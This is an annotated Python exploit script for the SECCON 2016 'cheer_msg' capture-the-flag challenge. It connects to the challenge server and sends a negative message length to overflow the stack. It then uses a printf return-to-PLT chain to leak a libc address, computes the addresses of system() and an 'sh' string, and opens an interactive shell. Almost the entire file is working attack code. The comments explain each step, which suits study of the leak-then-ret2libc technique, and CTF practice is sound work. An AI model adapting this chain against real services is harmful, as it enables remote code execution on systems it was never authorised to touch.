# Exploit script for the SECCON 2016 "cheer_msg" challenge (pwntools, Python 2:
# print statement and raw_input()).  Two rounds of the same stack overwrite:
# the first returns into printf() to leak printf's GOT entry, the second uses
# that leak to return into system() with a "sh" string located inside libc.
# Defender's reading: the hard-coded 0x0804xxxx addresses mean the binary is
# treated as non-PIE, and the libc build is pinned by the hash in its filename;
# what the negative length does inside the target is not visible on this page
# (presumably it bypasses the length check — verify against the binary).
from pwn import *

# Local copies of the challenge binary and the 32-bit libc the offsets come from.
elf = "/root/pwn/seccon/cheer_msg"
lib32 = "/root/pwn/seccon/libc-2.19.so-c4dc1270c1449536ab2efbbe7053231f1a776368"
#lib64 = "/lib/x86_64-linux-gnu/libc-2.21.so"

# Remote target; the commented process() line is the local-testing alternative.
#s = process(elf)
s = remote('cheermsg.pwn.seccon.jp',30527)
e = ELF(elf)    # challenge binary: source of PLT/GOT addresses
l = ELF(lib32)  # libc: source of symbol offsets and the "sh" string

# Only DEBUG == 2 enables pwntools packet logging; the value 1 is a no-op as written.
DEBUG = 1
if DEBUG == 2:
    context.log_level = 'debug'

# Round 1: answer the first prompt with a negative length (the same value is
# sent again in round 2 at the "Message Length >>" prompt).
print s.recv()
s.sendline("-142")
print s.recv()

ppppr = 0x80487AC   # presumably a pop x4 ; ret gadget (from the name); only used in the commented-out chains below
main = 0x080484B0   # address of main, used as printf's return address so the program runs a second time
# Distance from printf to system in this libc build; subtracted from the leak in round 2.
offset = l.symbols['printf'] - l.symbols['system']

# Earlier chain attempts kept by the author for reference.
#sh = p32(0x08048627) + p32(0x804a090) + p32(0x804a090-1) + p32(100)
#sh += p32(0x080485CA) + p32(ppppr + 1) + p32(0x804A020) + p32(20)
#sh = p32(0x0804863C) + p32(0x0804A065)
#sh = "A"*80+"PPPR12345678asdfzxcv" + "\n"

# Chain 1: printf (PLT), then main as the return address, then printf's GOT
# slot as the format-string argument -> the resolved libc address is printed raw.
sh = p32(e.symbols['printf']) + p32(main) + p32(e.got['printf'])

raw_input()  # pause before sending, e.g. to attach a debugger to a local process
#s.send("A"*0x30+shellcode)
s.sendline ( "A"*0x10 + sh)   # 16 bytes of padding precede the chain

# Read up to the message echo; the 4 bytes after the newline are the leaked GOT value.
print s.recvuntil("Message : ")
print s.recvuntil("\n")
leak = u32(s.recv(4))
print "[*] LEAK : %x" % leak

# Round 2 (the program was restarted through main): same negative length again.
print s.recvuntil("Message Length >>")
s.sendline("-142")

# Chain 2: system() derived from the leak, a dummy 4-byte return address, then
# the address of "sh\x00" in libc computed from its distance to printf.
sh = p32(leak - offset) + "AAAA" + p32(leak - (l.symbols['printf'] - list(l.search("sh\x00"))[0]))
s.sendline( "A"*0x10 + sh)

s.interactive()